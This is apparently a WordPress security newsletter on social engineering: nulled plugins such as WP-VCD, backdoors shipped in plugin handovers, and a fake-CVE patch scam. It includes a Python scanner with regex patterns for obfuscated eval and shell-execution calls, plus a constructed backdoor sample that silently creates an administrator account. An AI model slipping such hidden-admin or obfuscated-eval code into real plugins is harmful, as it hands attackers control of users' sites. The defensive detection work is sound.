In the past two issues, we talked about the different ways websites are taken over: by compromising privileged accounts and by exploiting security vulnerabilities in WordPress core, plugins and themes.
Sometimes plugins and themes are not just vulnerable, but intentionally malicious. This week, we'll look into another common technique that hackers use to take over websites.
This one relies entirely on exploiting weaknesses of human nature and is known as social engineering. Social engineering is all about psychology: tricking people into doing something they should not be doing.
Nulled WordPress plugins and themes
A very common and widespread technique for taking over websites is to make people infect their own site. Hackers get hold of a premium plugin, remove the code responsible for the licence checks, and then upload it to various websites and forums for people to download for free.
Hackers have been doing this in an organised manner, publishing entire libraries of "free premium plugins". These lists often rank well on Google, so people looking to download premium plugins or themes will most likely land on one of these pages.
While those plugins and themes mostly work as expected, the underlying code has more changes than just the removed licence checks. They come with backdoors and malware that give the hacker complete control over the site.
One such operation, known as WP-VCD, systematically published popular nulled plugins and themes for WordPress and used different websites to spread them to as many people as possible. You'll find a technical analysis of the WP-VCD nulled plugin malware in the resources below.
Plugins with backdoors
There have been multiple cases where a developer has grown tired of maintaining a project and hands it over to a new developer. It's common for hackers to look for such opportunities so they can take over the plugin and ship a backdoor in an official update.
Malicious developers can add functions that create new admin accounts and control the website remotely. We've also seen cases in the past where the developer had no malicious intent, but built in a functional backdoor to provide support to users.
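Both of the mechanisms above, a nulled copy with extra code and a backdoor shipped in an update, end up as PHP in the plugin directory, so a site owner's first check is to read what that PHP actually does. The following is an added example, not code from Patchstack, from the WP-VCD analysis or from any plugin vendor: a small heuristic scanner that walks a plugin directory and flags lines typical of the backdoors described here, such as code that silently creates a user and gives it the administrator role, or that evaluates obfuscated code. The indicator patterns, their weights and both sample plugin files are constructed for illustration; legitimate plugins also create users, so a "review" result means read the file, not delete it, and the definitive check is a diff against a clean copy obtained from the original developer.

```python
"""Heuristic scan of WordPress plugin PHP for backdoor indicators (added example)."""
import re
import tempfile
from dataclasses import dataclass
from pathlib import Path

# Indicator name -> (regex, weight). Weights are an assumption of this
# example, not a published scoring scheme.
INDICATORS = {
    # eval() over decoded/inflated data: classic way to hide a payload in a nulled plugin
    "obfuscated_eval": (re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I), 3),
    # request parameters fed straight into code or shell execution
    "input_to_exec": (re.compile(
        r"\b(?:eval|assert|system|exec|shell_exec|passthru)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I), 3),
    # a user object being promoted to administrator
    "role_administrator": (re.compile(
        r"\b(?:set_role|add_role)\s*\(\s*['\"]administrator['\"]", re.I), 2),
    # user creation alone is common in legitimate plugins, so it only counts a little
    "user_creation": (re.compile(
        r"\b(?:wp_create_user|wp_insert_user)\s*\(", re.I), 1),
}

@dataclass
class Finding:
    file: str
    line_no: int
    indicator: str
    weight: int
    text: str

def scan_source(source, filename="<string>"):
    """Return one Finding per (line, indicator) match in a PHP source string."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for name, (pattern, weight) in INDICATORS.items():
            if pattern.search(line):
                findings.append(Finding(filename, line_no, name, weight, line.strip()))
    return findings

def severity(findings):
    """Collapse a file's findings into clean / review / high."""
    score = sum(f.weight for f in findings)
    if score >= 3:
        return "high"
    return "review" if score > 0 else "clean"

def scan_plugin(plugin_dir):
    """Scan every .php file under plugin_dir; returns {relative_path: [Finding, ...]}."""
    root = Path(plugin_dir)
    results = {}
    for php in sorted(root.rglob("*.php")):
        rel = str(php.relative_to(root))
        results[rel] = scan_source(php.read_text(encoding="utf-8", errors="replace"), rel)
    return results

# Constructed sample: a legitimate signup plugin that creates subscriber accounts.
CLEAN_PLUGIN = """<?php
/* Plugin Name: Newsletter Signup (constructed clean sample) */
add_action('admin_post_nopriv_signup', function () {
    $email = sanitize_email($_POST['email'] ?? '');
    // New users only ever get the subscriber role.
    wp_insert_user(['user_login' => $email, 'user_email' => $email, 'role' => 'subscriber']);
});
"""

# Constructed sample: a "nulled" premium plugin with the licence check removed
# and a hidden admin account plus an obfuscated payload added.
NULLED_PLUGIN = """<?php
/* Plugin Name: Premium Slider Pro (constructed nulled sample) */
// Licence check removed here.
add_action('init', function () {
    if (!username_exists('wp_support')) {
        $id = wp_create_user('wp_support', 'PLACEHOLDER', 'support@example.invalid');
        (new WP_User($id))->set_role('administrator');
    }
});
eval(base64_decode('<base64 placeholder>'));
"""

def demo():
    """Write both constructed samples to a temp dir, scan them, return {file: severity}."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "newsletter-signup.php").write_text(CLEAN_PLUGIN, encoding="utf-8")
        Path(tmp, "premium-slider-pro.php").write_text(NULLED_PLUGIN, encoding="utf-8")
        results = scan_plugin(tmp)
    report = {}
    for rel, findings in results.items():
        report[rel] = severity(findings)
        for f in findings:
            print(f"{f.file}:{f.line_no} [{f.indicator}] {f.text}")
    return report

if __name__ == "__main__":
    print(demo())
```

Point `scan_plugin()` at a real `wp-content/plugins/<name>` directory to audit an installed plugin; a file that creates a user and sets the administrator role with no visible admin UI behind it is exactly the pattern the newsletter warns about, while a lone `user_creation` hit is usually just a registration or membership feature.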
Scams
While nulled plugins and themes exploit the urge to save money by offering for free something you should be paying for, there are also scams that exploit other human emotions, such as fear.
A very good example is the recent scam that impersonated the WordPress core team and claimed that WordPress core had a critical vulnerability which needed to be manually patched with a special plugin.
While for many people it was an obvious scam, there were people, even on Reddit, who asked for public help to restore their website. It's also important to note that many non-technical WordPress users might not even notice that the site got infected after installing the malware.
Conclusion
Hackers take advantage of known human emotions, both positive (such as the excitement of getting something for free) and negative (such as the fear of losing something valuable). Unfortunately, there's no firewall you can apply to human emotions and behaviour.
There are no Robin Hoods who spend their free time and money making premium software free for the public. They always have a reason for doing it, which comes down to what we covered in the first episode.
Always make sure to get your software only from trusted sources, and if it's paid, please support the original developers who put their time and effort into building it. Supporting the developers also keeps them motivated, so there's less chance the project will be handed over to the wrong hands.
PS! As a reminder, if you wish to get these episodes directly by email, here's the newsletter we created just for that: http://subscribepage.io/patchstack
Stay vigilant and see you next week!
Resources:
An In-Depth Analysis Of The WP-VCD Malware – Patchstack
Fake CVE Phishing Campaign Tricks WordPress Users Into Installing Malware (patchstack.com)
Join the Conversation!
There's a dedicated thread on this post inside of The Admin Bar community. Join in on the conversation, ask questions, and learn more!